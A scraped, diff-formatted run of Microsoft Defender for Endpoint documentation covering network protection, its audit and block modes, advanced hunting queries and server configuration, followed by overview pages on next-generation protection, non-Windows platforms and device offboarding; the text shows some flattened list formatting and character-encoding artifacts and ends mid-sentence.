-> - Encrypted URLs (FQDN only) can be blocked in third party browsers (i.e. other than Internet Explorer, Edge).
-> - Full URL path blocks can be applied for unencrypted URLs.
->
-> There might be up to 2 hours of latency (usually less) between the time the action is taken, and the URL and IP being blocked.
-
-Watch this video to learn how Network protection helps reduce the attack surface of your devices from phishing scams, exploits, and other malicious content.
-> [!VIDEO https://www.microsoft.com/en-us/videoplayer/embed/RE4r4yZ]
-
-## Requirements for network protection
-
-Network protection requires Windows 10 or 11 (Pro or Enterprise), Windows Server version 1803 or later, macOS version 11 or later, or Defender Supported Linux versions, and Microsoft Defender Antivirus real-time protection.
-
-| Windows version | Microsoft Defender Antivirus |
-|:|:|
-| Windows 10 version 1709 or later, Windows 11, Windows Server 1803 or later | Make sure that [Microsoft Defender Antivirus real-time protection](configure-real-time-protection-microsoft-defender-antivirus.md), [behavior monitoring](/microsoft-365/security/defender-endpoint/behavior-monitor) and [cloud-delivered protection](enable-cloud-protection-microsoft-defender-antivirus.md) are enabled (active) |
-| Windows Server 2012 R2 and Windows Server 2016 with the unified agent | Platform Update version 4.18.2001.x.x or newer |
-
-## Why network protection is important
-
-Network protection is a part of the attack surface reduction group of solutions in Microsoft Defender for Endpoint. Network protection enables the network layer to block URLs and IP addresses. Network protection can block URLs from being accessed by using certain browsers and standard network connections. By default, network protection guards your computers from known malicious URLs using the SmartScreen feed, which blocks malicious URLs in a manner similar to SmartScreen in Microsoft Edge browser. The network protection functionality can be extended to:
--- Block IP/URL addresses from your own threat intelligence ([indicators](indicator-ip-domain.md))-- Block unsanctioned services from [Microsoft Defender for Cloud Apps](/defender-cloud-apps/what-is-defender-for-cloud-apps)-- Block browser access to websites based on category ([Web content filtering](web-content-filtering.md))-
-Network protection is a critical part of the Microsoft protection and response stack.
-
-> [!TIP]
-> For details about network protection for Windows Server, Linux, MacOS and Mobile Threat Defense (MTD), see [Proactively hunt for threats with advanced hunting](advanced-hunting-overview.md).
-
-### Block Command and Control attacks
-
-Command and Control (C2) server computers are used by malicious users to send commands to systems previously compromised by malware. C2 attacks typically hide in cloud-based services such as file-sharing and webmail services, enabling the C2 servers to avoid detection by blending in with typical traffic.
-
-C2 servers can be used to initiate commands that can:
--- Steal data-- Control compromised computers in a botnet-- Disrupt legitimate applications-- Spread malware, such as ransomware-
-The network protection component of Defender for Endpoint identifies and blocks connections to C2 infrastructures used in human-operated ransomware attacks, using techniques like machine learning and intelligent indicator-of-compromise (IoC) identification.
-
-#### Network protection: C2 detection and remediation
-
-In its initial form, ransomware is a commodity threat, pre-programmed and focused on limited, specific outcomes (for example, encrypting a computer). However, ransomware has evolved into a sophisticated threat that is human-driven, adaptive, and focused on larger scale and more widespread outcomes, like holding an entire organization's assets or data for ransom.
-
-Support for Command and Control servers (C2) is a key part of this ransomware evolution and is what enables these attacks to adapt to the environment they target. Breaking the link to the command-and-control infrastructure stops the progression of an attack to its next stage. For additional information about C2 detection and remediation, see [Detecting and remediating command and control attacks at the network layer](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/detecting-and-remediating-command-and-control-attacks-at-the/ba-p/3650607).
-
-#### Network protection: New toast notifications
-
-| New mapping | Response category | Sources |
-| : | : | : |
-| phishing | Phishing | SmartScreen |
-| malicious | Malicious | SmartScreen |
-| command and control | C2 | SmartScreen |
-| command and control | COCO | SmartScreen |
-| malicious | Untrusted | SmartScreen |
-| by your IT admin | CustomBlockList | |
-| by your IT admin | CustomPolicy | |
-
-> [!NOTE]
-> **customAllowList** does not generate notifications on endpoints.
-
-### New notifications for network protection determination
-
-A new, publicly available capability in network protection utilizes functions in SmartScreen to block phishing activities from malicious command and control sites.
-
-When an end user attempts to visit a website in an environment in which network protection is enabled, three scenarios are possible:
--- The URL has a **known good reputation** - In this case the user is permitted access without obstruction, and there's no toast notification presented on the endpoint. In effect, the domain or URL is set to _Allowed_.-- The URL has an **unknown or uncertain reputation** - The user's access is blocked, but with the ability to circumvent (unblock) the block. In effect, the domain or url is set to _Audit_.-- The URL has a **known bad (malicious) reputation** - The user is prevented from access. In effect, the domain or url is set to _Block_.-
-#### Warn experience
-
-A user visits a website:
--- If the url has an unknown or uncertain reputation, a toast notification will present the user with the following options:-
- - **Ok** - The toast notification is released (removed), and the attempt to access the site is ended.
- - **Unblock** - The user will have access to the site for 24 hours; at which point the block is reenabled. The user can continue to use **Unblock** to access the site until such time that the administrator prohibits (blocks) the site, thus removing the option to **Unblock**.
- - **Feedback** - The toast notification presents the user with a link to submit a ticket, which the user can use to submit feedback to the administrator in an attempt to justify access to the site.
-
- :::image type="content" source="media/network-protection-phishing-warn-2.png" alt-text="Shows a network protection phishing content warn notification.":::
-
- > [!NOTE]
- > The images shown here for warn experience and block experience (below) both list **"blocked url"** as example placeholder text; in a functioning environment the actual url or domain will be listed.
-
-#### Block experience
-
-A user visits a website:
--- If the url has a bad reputation, a toast notification will present the user with the following options:
- - **Ok** The toast notification is released (removed), and the attempt to access the site is ended.
- - **Feedback** The toast notification presents the user with a link to submit a ticket, which the user can use to submit feedback to the administrator in an attempt to justify access to the site.
-
- :::image type="content" source="media/network-protection-phishing-blocked.png" alt-text="Shows a network protection known phishing content blocked notification." lightbox="media/network-protection-phishing-blocked.png":::
-
-## SmartScreen Unblock
-
-With indicators in Defender for Endpoint, administrators can allow end users to bypass warnings that are generated for some URLs and IPs. Depending on why the URL was blocked, when a SmartScreen block is encountered it may offer the ability to unblock the site for up to 24 hours. In such cases, a Windows Security toast notification will appear, permitting the end-user to **Unblock** the URL or IP for the defined period of time.
--
-Microsoft Defender for Endpoint administrators can configure SmartScreen Unblock functionality in the [Microsoft Defender portal](https://security.microsoft.com) using an "allow" indicator for IPs, URLs, and domains.
--
-See [Create indicators for IPs and URLs/domains](indicator-ip-domain.md).
-
-## Using network protection
-
-Network protection is enabled per device, which is typically done using your management infrastructure. For supported methods, see [Turn on network protection](enable-network-protection.md).
-
-> [!NOTE]
-> Microsoft Defender Antivirus must be active to enable network protection.
-
-You can enable network protection in **Audit** mode or **Block** mode. If you want to evaluate the impact of enabling network protection before actually blocking IP addresses or URLs, you can enable network protection in Audit mode for time to gather data on what would be blocked. Audit mode logs when end users have connected to an address or site that would otherwise have been blocked by network protection. Note that in order for indicators of compromise (IoC) or Web content filtering (WCF) to work, network protection must be in "Block mode"
-
-For information about network protection for Linux and macOS see: [Network protection for Linux](network-protection-linux.md) and [Network protection for macOS](network-protection-macos.md).
-
-## Advanced hunting
-
-If you're using advanced hunting to identify audit events, you'll have up to 30 days history available from the console. See [Advanced hunting](advanced-hunting-overview.md).
-
-You can find the audit events in **Advanced hunting** in the Defender for Endpoint portal ([https://security.microsoft.com](https://security.microsoft.com)).
-
-Audit events are in DeviceEvents with an ActionType of `ExploitGuardNetworkProtectionAudited`. Blocks are shown with an ActionType of `ExploitGuardNetworkProtectionBlocked`.
-
-Here's an example query for viewing Network Protection events for third-party browsers:
-
-```kusto
-
-DeviceEvents
-|where ActionType in ('ExploitGuardNetworkProtectionAudited','ExploitGuardNetworkProtectionBlocked')
-
-```
--
-> [!TIP]
-> These entries have data in the **AdditionalFields** column which gives you great info around the action, if you expand **AdditionalFields** you can also get the fields: **IsAudit**, **ResponseCategory**, and **DisplayName**.
-
-Here's another example:
-
-```kusto
-
-DeviceEvents
-|where ActionType contains "ExploitGuardNetworkProtection"
-|extend ParsedFields=parse_json(AdditionalFields)
-|project DeviceName, ActionType, Timestamp, RemoteUrl, InitiatingProcessFileName, IsAudit=tostring(ParsedFields.IsAudit), ResponseCategory=tostring(ParsedFields.ResponseCategory), DisplayName=tostring(ParsedFields.DisplayName)
-|sort by Timestamp desc
-
-```
-
-The Response category tells you what caused the event, for example:
-
-| ResponseCategory | Feature responsible for the event |
-|:|:|
-| CustomPolicy | WCF |
-| CustomBlockList | Custom indicators |
-| CasbPolicy | Defender for Cloud Apps |
-| Malicious | Web threats |
-| Phishing | Web threats |
-
-For more information, see [Troubleshoot endpoint blocks](web-protection-overview.md#troubleshoot-endpoint-blocks).
-
-Note that Microsoft Defender SmartScreen events for the Microsoft Edge browser specifically, needs a different query:
-
-```kusto
-
-DeviceEvents
-| where ActionType == "SmartScreenUrlWarning"
-| extend ParsedFields=parse_json(AdditionalFields)
-| project DeviceName, ActionType, Timestamp, RemoteUrl, InitiatingProcessFileName
-
-```
-
-You can use the resulting list of URLs and IPs to determine what would have been blocked if the device was in block mode, and which feature blocked them. Review each item on the list to identify URLS or IPs whether any are necessary to your environment. If you find any entries that have been audited which are critical to your environment, create an Indicator to allow them in your network. Allow URL / IP indicators take precedence over any block.
-
-Once you've created an indicator, you can look at resolving the underlying issue:
--- SmartScreen ΓÇô request review-- Indicator ΓÇô modify existing indicator-- MCA ΓÇô review unsanctioned APP-- WCF ΓÇô request recategorization-
-Using this data you can make an informed decision on enabling Network protection in Block mode. See [Order of precedence for Network protection blocks](web-protection-overview.md#order-of-precedence).
-
-> [!NOTE]
-> As this is a per-device setting, if there are devices that cannot move to Block mode you can simply leave them on audit until you can rectify the challenge and you will still receive the auditing events.
-
-For information about how to report false positives see [Report false positives](web-protection-overview.md#report-false-positives).
-
-For details on how to create your own Power BI reports, see [Create custom reports using Power BI](api-power-bi.md).
-
-## Configuring network protection
-
-For more information about how to enable network protection, see **[Enable network protection](enable-network-protection.md)**. Use Group Policy, PowerShell, or MDM CSPs to enable and manage network protection in your network.
-
-After you've enabled network protection, you might need to configure your network or firewall to allow the connections between your endpoint devices and the web
--- `.smartscreen.microsoft.com`-- `.smartscreen-prod.microsoft.com`-
-## Viewing network protection events
-
-Network protection works best with [Microsoft Defender for Endpoint](microsoft-defender-endpoint.md), which gives you detailed reporting into exploit protection events and blocks as part of [alert investigation scenarios](investigate-alerts.md).
-
-When network protection blocks a connection, a notification is displayed from the Action Center. Your security operations team can [customize the notification](attack-surface-reduction-rules-deployment-implement.md#customize-attack-surface-reduction-rules) with your organization's details and contact information. In addition, individual attack surface reduction rules can be enabled and customized to suit certain techniques to monitor.
-
-You can also use [audit mode](audit-windows-defender.md) to evaluate how network protection would impact your organization if it were enabled.
-
-<a name='review-network-protection-events-in-the-microsoft-365-defender-portal'></a>
-
-## Review network protection events in the Microsoft Defender portal
-
-Defender for Endpoint provides detailed reporting into events and blocks as part of its [alert investigation scenarios](investigate-alerts.md). You can view these details in the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)) in the [alerts queue](review-alerts.md) or by using [advanced hunting](advanced-hunting-overview.md). If you're using [audit mode](audit-windows-defender.md), you can use advanced hunting to see how network protection settings would affect your environment if they were enabled.
-
-## Review network protection events in Windows Event Viewer
-
-You can review the Windows event log to see events that are created when network protection blocks (or audits) access to a malicious IP or domain:
-
-1. [Copy the XML directly](event-views.md).
-
-2. Select **OK**.
-
-This procedure creates a custom view that filters to only show the following events related to network protection:
-
-|Event ID|Description|
-|||
-|5007|Event when settings are changed|
-|1125|Event when network protection fires in audit mode|
-|1126|Event when network protection fires in block mode|
-
-## Network protection and the TCP three-way handshake
-
-With network protection, the determination of whether to allow or block access to a site is made after the completion of the [three-way handshake via TCP/IP](/troubleshoot/windows-server/networking/three-way-handshake-via-tcpip). Thus, when a site is blocked by network protection, you might see an action type of `ConnectionSuccess` under [`DeviceNetworkEvents`](../defender/advanced-hunting-devicenetworkevents-table.md) in the Microsoft Defender portal, even though the site was blocked. `DeviceNetworkEvents` are reported from the TCP layer, and not from network protection. After the three-way handshake has completed, access to the site is allowed or blocked by network protection.
-
-Here's an example of how that works:
-
-1. Suppose that a user attempts to access a website on their device. The site happens to be hosted on a dangerous domain, and it should be blocked by network protection.
-
-2. The three-way handshake via TCP/IP commences. Before it completes, a `DeviceNetworkEvents` action is logged, and its `ActionType` is listed as `ConnectionSuccess`. However, as soon as the three-way handshake process completes, network protection blocks access to the site. All of this happens quickly. A similar process occurs with [Microsoft Defender SmartScreen](/windows/security/threat-protection/microsoft-defender-smartscreen/microsoft-defender-smartscreen-overview); it's when the three-way handshake completes that a determination is made, and access to a site is either blocked or allowed.
-
-3. In the Microsoft Defender portal, an alert is listed in the [alerts queue](alerts-queue.md). Details of that alert include both `DeviceNetworkEvents` and [`AlertEvidence`](../defender/advanced-hunting-alertevidence-table.md). You can see that the site was blocked, even though you also have a `DeviceNetworkEvents` item with the ActionType of `ConnectionSuccess`.
-
-## Considerations for Windows virtual desktop running Windows 10 Enterprise Multi-Session
-
-Due to the multi-user nature of Windows 10 Enterprise, keep the following points in mind:
-
-1. Network protection is a device-wide feature and can't be targeted to specific user sessions.
-
-2. Web content filtering policies are also device-wide.
-
-3. If you need to differentiate between user groups, consider creating separate Windows Virtual Desktop host pools and assignments.
-
-4. Test network protection in audit mode to assess its behavior before rolling out.
-
-5. Consider resizing your deployment if you have a large number of users or a large number of multi-user sessions.
-
-### Alternative option for network protection
-
-For Windows Server 2012R2/2016 unified MDE client, Windows Server version 1803 or newer, Windows Server 2019 or newer, and Windows 10 Enterprise Multi-Session 1909 and up, used in Windows Virtual Desktop on Azure, network protection for Microsoft Edge can be enabled using the following method:
-
-1. Use [Turn on network protection](enable-network-protection.md) and follow the instructions to apply your policy.
-
-2. Execute the following PowerShell commands:
-
- - `Set-MpPreference -EnableNetworkProtection Enabled`
- - `Set-MpPreference -AllowNetworkProtectionOnWinServer 1`
- - `Set-MpPreference -AllowNetworkProtectionDownLevel 1`
- - `Set-MpPreference -AllowDatagramProcessingOnWinServer 1`
-
-> [!NOTE]
-> In some cases, depending on your infrastructure, volume of traffic, and other conditions, `Set-MpPreference -AllowDatagramProcessingOnWinServer 1` can have an effect on network performance.
-
-### Network protection for Windows Servers
-
-Following is information specific to Windows Servers.
-
-#### Verify that network protection is enabled
-
-Verify whether network protection is enabled on a local device by using Registry Editor.
-
-1. Select the **Start** button in the task bar and type **regedit** to open the Registry Editor.
-1. Select **HKEY_LOCAL_MACHINE** from the side menu.
-1. Navigate through the nested menus to **SOFTWARE** > **Policies** > **Microsoft** > **Windows defender** > **Windows Defender Exploit Guard** > **Network Protection**.
-
- (If the key is not present, navigate to **SOFTWARE** > **Microsoft** > **Windows Defender** > **Windows Defender Exploit Guard** > **Network Protection**)
-
-4. Select **EnableNetworkProtection** to see the current state of network protection on the device:
-
- - 0 = Off
- - 1 = On (enabled)
- - 2 = Audit mode
-
-For additional information, see: [Turn on network protection](enable-network-protection.md)
-
-#### Network protection suggestion
-
-For Windows Server 2012R2/2016 unified MDE client, Windows Server version 1803 or newer, Windows Server 2019 or newer, and Windows 10 Enterprise Multi-Session 1909 and up (used in Windows Virtual Desktop on Azure), there are additional registry keys that must be enabled:
-
-**HKEY_LOCAL_MACHINE**\\**SOFTWARE**\\**Microsoft**\\**Windows Defender**\\**Windows Defender Exploit Guard**\\**Network Protection**
--- **AllowNetworkProtectionOnWinServer** (dword) 1 (hex)-- **EnableNetworkProtection** (dword) 1 (hex)-- **AllowNetworkProtectionDownLevel** (dword) 1 (hex) - Windows Server 2012R2 and Windows Server 2016 only-
-> [!NOTE]
-> Depending on your infrastructure, volume of traffic, and other conditions, **HKEY_LOCAL_MACHINE**\\**SOFTWARE**\\**Policies**\\**Microsoft**\\**Windows Defender** \\**NIS**\\**Consumers**\\**IPS** - **AllowDatagramProcessingOnWinServer (dword) 1 (hex)** can have an effect on network performance.
-
-For additional information, see: [Turn on network protection](enable-network-protection.md)
-
-#### Windows Servers and Windows Multi-session configuration requires PowerShell
-
-For Windows Servers and Windows Multi-session, there are additional items that you must enable by using PowerShell cmdlets. For Windows Server 2012R2/2016 unified MDE client, Windows Server version 1803 or newer, Windows Server 2019 or newer, and Windows 10 Enterprise Multi-Session 1909 and up, used in Windows Virtual Desktop on Azure.
-
-1. Set-MpPreference -EnableNetworkProtection Enabled
-1. Set-MpPreference -AllowNetworkProtectionOnWinServer 1
-1. Set-MpPreference -AllowNetworkProtectionDownLevel 1
-1. Set-MpPreference -AllowDatagramProcessingOnWinServer 1
-
-> [!NOTE]
-> In some cases, depending on your infrastructure, volume of traffic, and other conditions, **Set-MpPreference -AllowDatagramProcessingOnWinServer 1** can have an effect on network performance.
--
-## Network protection troubleshooting
-
-Due to the environment where network protection runs, the feature might not be able to detect operating system proxy settings. In some cases, network protection clients are unable to reach the cloud service. To resolve the connectivity problem, [configure a static proxy for Microsoft Defender Antivirus](configure-proxy-internet.md#configure-a-static-proxy-for-microsoft-defender-antivirus).
-
-## Optimizing network protection performance
-
-Network protection now has a performance optimization that allows Block mode to start asynchronously inspecting long-lived connections, which might provide a performance improvement and can also help with app compatibility problems. This optimization capability is on by default. You can turn off this capability by using the following PowerShell cmdlet:
-
-`Set-MpPreference -AllowSwitchToAsyncInspection $false`
-
-## See also
--- [Evaluate network protection](evaluate-network-protection.md) | Undertake a quick scenario that demonstrates how the feature works, and what events would typically be created.-- [Enable network protection](enable-network-protection.md) | Use Group Policy, PowerShell, or MDM CSPs to enable and manage network protection in your network.-- [Configuring attack surface reduction capabilities in Microsoft Intune](/mem/intune/protect/endpoint-security-asr-policy)-- [Network protection for Linux](network-protection-linux.md) | To learn about using Microsoft Network protection for Linux devices.-- [Network protection for macOS](network-protection-macos.md) | To learn more about Microsoft Network protection for macOS
security Next Generation Protection https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/next-generation-protection.md
- Title: Overview of next-generation protection in Microsoft Defender for Endpoint
-description: Get an overview of next-generation protection in Microsoft Defender for Endpoint. Reinforce the security perimeter of your network by using next-generation protection designed to catch all types of emerging threats.
----------- m365-security-- tier1-- mde-ngp Previously updated : 02/28/2024--
-# Next-generation protection overview
-
-**Applies to**
--- Microsoft Defender Antivirus-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Business](../defender-business/index.yml)-
-Microsoft Defender for Endpoint includes next-generation protection to catch and block all types of emerging threats. The majority of modern malware is polymorphic, meaning it constantly mutates to evade detection. As soon as one variant is identified, another takes its place. This rapid evolution underscores the need for agile and innovative security solutions.
-
-Next-generation protections, such as [Microsoft Defender Antivirus](microsoft-defender-antivirus-windows.md) blocks malware using local and cloud-based machine learning models, behavior analysis, and heuristics. Microsoft Defender Antivirus uses predictive technologies, machine learning, applied science, and artificial intelligence to detect and block malware at the first sign of abnormal behavior.
-
-In addition to Microsoft Defender Antivirus, your next-generation protection services include the following capabilities:
--- [Behavior-based, heuristic, and real-time antivirus protection](configure-protection-features-microsoft-defender-antivirus.md), which includes always-on scanning using file and process behavior monitoring and other heuristics (also known as *real-time protection*). It also includes detecting and blocking apps that are deemed unsafe, but might not be detected as malware.-- [Cloud-delivered protection](cloud-protection-microsoft-defender-antivirus.md), which includes near-instant detection and blocking of new and emerging threats.-- [Dedicated protection and product updates](microsoft-defender-antivirus-updates.md), which includes updates related to keeping Microsoft Defender Antivirus up to date.-
-Next-generation protection is included in both [Defender for Endpoint Plan 1 and Plan 2](microsoft-defender-endpoint.md). Next-generation protection is also included in [Microsoft Defender for Business](/microsoft-365/security/defender-business/mdb-overview) and [Microsoft 365 Business Premium](/microsoft-365/business-premium/m365bp-overview).
--
-To configure next-generation protection services, see [Configure Microsoft Defender Antivirus features](configure-microsoft-defender-antivirus-features.md).
-
-If you're looking for Microsoft Defender Antivirus-related information for other platforms, see one of the following articles:
--- [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md)-- [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)-- [macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-macos)-- [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md)-- [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)-- [Configure Defender for Endpoint on Android features](android-configure.md)-- [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)-
-> [!TIP]
-> **Performance tip** Due to a variety of factors (examples listed below) Microsoft Defender Antivirus, like other antivirus software, can cause performance issues on endpoint devices. In some cases, you might need to tune the performance of Microsoft Defender Antivirus to alleviate those performance issues. Microsoft's **Performance analyzer** is a PowerShell command-line tool that helps determine which files, file paths, processes, and file extensions might be causing performance issues; some examples are:
->
-> - Top paths that impact scan time
-> - Top files that impact scan time
-> - Top processes that impact scan time
-> - Top file extensions that impact scan time
-> - Combinations ΓÇô for example:
-> - top files per extension
-> - top paths per extension
-> - top processes per path
-> - top scans per file
-> - top scans per file per process
->
-> You can use the information gathered using Performance analyzer to better assess performance issues and apply remediation actions.
-> See [Performance analyzer for Microsoft Defender Antivirus](tune-performance-defender-antivirus.md).
--
security Non Windows https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/non-windows.md
- Title: Microsoft Defender for Endpoint on other platforms
-description: Learn about Microsoft Defender for Endpoint capabilities on other platforms
-----
- - m365-security
- - m365solution-evalutatemtp
- - highpri
- - tier1
-- Previously updated : 12/18/2020--
-# Microsoft Defender for Endpoint on other platforms
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1 and Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-Microsoft has been on a journey to extend its industry leading endpoint security capabilities beyond Windows and Windows Server to macOS, Linux, Android, and iOS.
-
-Organizations face threats across a variety of platforms and devices. Our teams have committed to building security solutions not just *for* Microsoft, but also *from* Microsoft to enable our customers to protect and secure their heterogeneous environments. We're listening to customer feedback and partnering closely with our customers to build solutions that meet their needs.
-
-With Microsoft Defender for Endpoint, customers benefit from a unified view of all threats and alerts in the Microsoft Defender portal, across Windows and non-Windows platforms, enabling them to get a full picture of what's happening in their environment, which empowers them to more quickly assess and respond to threats.
-
-> [!NOTE]
-> Microsoft Defender for Endpoint doesn't support native compute workloads in Amazon Web Services (AWS) and Google Cloud Platform (GCP).
-
-## Microsoft Defender for Endpoint on macOS
-
-Microsoft Defender for Endpoint on macOS offers antivirus, endpoint detection and response (EDR), and vulnerability management capabilities for the three latest released versions of macOS. Customers can deploy and manage the solution through Microsoft Intune and Jamf. Just like with Microsoft Office applications on macOS, Microsoft Auto Update is used to manage Microsoft Defender for Endpoint on Mac updates. Security Management for Microsoft Defender for Endpoint is now supported on MacOS endpoints. For information about the key features and benefits, read our [announcements](https://techcommunity.microsoft.com/t5/microsoft-defender-atp/bg-p/MicrosoftDefenderATPBlog/label-name/macOS).
-
-For more details on how to get started, visit the Defender for Endpoint on macOS [documentation](microsoft-defender-endpoint-mac.md).
-
-## Microsoft Defender for Endpoint on Linux
-
-Microsoft Defender for Endpoint on Linux offers preventative antivirus (AV), endpoint detection and response (EDR), and vulnerability management capabilities for Linux servers. This includes a full command line experience to configure and manage the agent, initiate scans, and manage threats. We support recent versions of the six most common Linux Server distributions: RHEL 7.2+, CentOS Linux 7.2+, Ubuntu 16 LTS, or higher LTS, SLES 12+, Debian 9+, and Oracle Linux 7.2. Microsoft Defender for Endpoint on Linux can be deployed and configured using Puppet, Ansible, or using your existing Linux configuration management tool. Security Management for Microsoft Defender for Endpoint is now supported on Linux. For information about the key features and benefits, read our
-[announcements](https://techcommunity.microsoft.com/t5/microsoft-defender-atp/bg-p/MicrosoftDefenderATPBlog/label-name/Linux).
-
-For more details on how to get started, visit the Microsoft Defender for Endpoint on Linux [documentation](microsoft-defender-endpoint-linux.md).
--
-> [!NOTE]
-> The following capabilities are not currently supported on Linux endpoints:> - Data loss prevention
-## Microsoft Defender for Endpoint on Android
-
-Microsoft Defender for Endpoint on Android is our mobile threat defense solution for devices running Android 6.0 and higher. Both Android Enterprise (Work Profile) and Device Administrator modes are supported. On Android, we offer web protection, which includes anti-phishing, blocking of unsafe connections, and setting of custom indicators. The solution scans for malware and potentially unwanted applications (PUA) and offers additional breach prevention capabilities through integration with Microsoft Intune and Conditional Access. For information about the key features and benefits, read our [announcements](https://techcommunity.microsoft.com/t5/microsoft-defender-atp/bg-p/MicrosoftDefenderATPBlog/label-name/Android).
-
-For more details on how to get started, visit the Microsoft Defender for Endpoint on Android [documentation](microsoft-defender-endpoint-android.md).
-
-## Microsoft Defender for Endpoint on iOS
-
-Microsoft Defender for Endpoint on iOS is our mobile threat defense solution for devices running iOS 11.0 and higher. Devices that are registered within a customer's tenant (enrolled or unenrolled) are supported. Both supervised and unsupervised enrolled devices are supported. On iOS, we offer web protection, which includes anti-phishing, blocking unsafe connections and setting custom indicators, and jailbreak detection. For more information about the key features and benefits, read our [announcements](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/bg-p/MicrosoftDefenderATPBlog/label-name/iOS).
-
-For more details on how to get started, visit the Microsoft Defender for Endpoint on iOS [documentation](microsoft-defender-endpoint-ios.md).
-
-## Licensing requirements
-
-Eligible Licensed Users may use Microsoft Defender for Endpoint on up to five concurrent devices. Microsoft Defender for Endpoint is also available for purchase from a Cloud Solution Provider (CSP).
-
-Customers can obtain Microsoft Defender for Endpoint on macOS through a standalone Microsoft Defender for Endpoint license, as part of Microsoft 365 A5/E5, or Microsoft 365 Security.
-
-Recently announced capabilities of Microsoft Defender for Endpoint on Android and iOS are included in the above mentioned offers as part of the five qualified devices for eligible licensed users.
-
-Defender for Endpoint on Linux is available through the Defender for Endpoint Server SKU that is available for both commercial and education customers.
-
-Please contact your account team or CSP for pricing and additional eligibility requirements.
security Offboard Machines https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/offboard-machines.md
- Title: Offboard devices
-description: Onboard Windows devices, servers, non-Windows devices from the Microsoft Defender for Endpoint service
------- m365-security-- tier2-- Previously updated : 04/03/2024--
-# Offboard devices
---
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender Vulnerability Management](https://go.microsoft.com/fwlink/?linkid=2229011)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-**Platforms**
-- macOS-- Linux-- Windows Server 2012 R2-- Windows Server 2016-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-offboarddevices-abovefoldlink)
-
-Follow the corresponding instructions depending on your preferred deployment method.
-
-The status of a device switches to [Inactive](fix-unhealthy-sensors.md#inactive-devices) seven (7) days after offboarding.
-
-Data, such as Timeline, Alerts, Vulnerabilities, etc., from devices that were offboarded remains in the Microsoft Defender portal until the configured [retention period](data-storage-privacy.md#how-long-will-microsoft-store-my-data-what-is-microsofts-data-retention-policy) expires.
-
-The device's profile (without data) remains in the [Device inventory](machines-view-overview.md) for no longer than 180 days.
-
-Devices that weren't active in the last 30 days aren't factored in on the data that reflects your organization's Defender Vulnerability Management [exposure score](tvm-exposure-score.md) and Microsoft Secure Score for Devices.
-
-To view only active devices, you can filter by [sensor health state](machines-view-overview.md#use-filters-to-customize-the-device-inventory-views), [device tags](machine-tags.md), or [machine groups](machine-groups.md).
-
-## Offboard Windows devices
--- [Offboard devices using a local script](configure-endpoints-script.md#offboard-devices-using-a-local-script)-- [Offboard devices using Group Policy](configure-endpoints-gp.md#offboard-devices-using-group-policy)-- [Offboard devices using Mobile Device Management tools](configure-endpoints-mdm.md#offboard-devices-using-mobile-device-management-tools)-
-## Offboard Servers
--- [Offboard servers](configure-server-endpoints.md#offboard-windows-servers)-
-## Offboard non-Windows devices
--- [Offboard non-Windows devices](configure-endpoints-non-windows.md#offboard-non-windows-devices)-
security Office 365 Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/office-365-microsoft-defender-antivirus.md
- Title: Better together - Microsoft Defender Antivirus and Office 365 (including OneDrive) - better protection from ransomware and cyberthreats
-description: Office 365, which includes OneDrive, goes together wonderfully with Microsoft Defender Antivirus. Read this article to learn more.
------- nextgen-- admindeeplinkDEFENDER------ m365-security-- tier2 Previously updated : 10/10/2023--
-# Better together: Microsoft Defender Antivirus and Office 365
---
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- Microsoft Defender Antivirus-- Microsoft 365-
-**Platforms**
-- Windows-
-You might already know that:
--- **Microsoft Defender Antivirus protects your Windows device from software threats, such as viruses, malware, and spyware**. Microsoft Defender Antivirus is your complete, ongoing protection, built into Windows 10 and Windows 11, and ready to go. [Microsoft Defender Antivirus is your next-generation protection](./microsoft-defender-antivirus-in-windows-10.md). --- **Office 365 includes anti-malware, anti-spam, and anti-phishing protection**. With your Office 365 subscription, you get premium email and calendars, Office apps, 1 TB of cloud storage (via OneDrive), and advanced security across all your devices. This is true for home and business users. And if you're a business user, and your organization is using Office 365 E5, you get even more protection through Microsoft Defender for Office 365. [Microsoft Defender for Office 365 security product overview](../office-365-security/mdo-about.md).--- **OneDrive, included in Office 365, enables you to store your files and folders online, and share them as you see fit**. You can work together with people (for work or fun), and coauthor files that are stored in OneDrive. You can also access your files across all your devices (your PC, phone, and tablet). [Manage sharing in 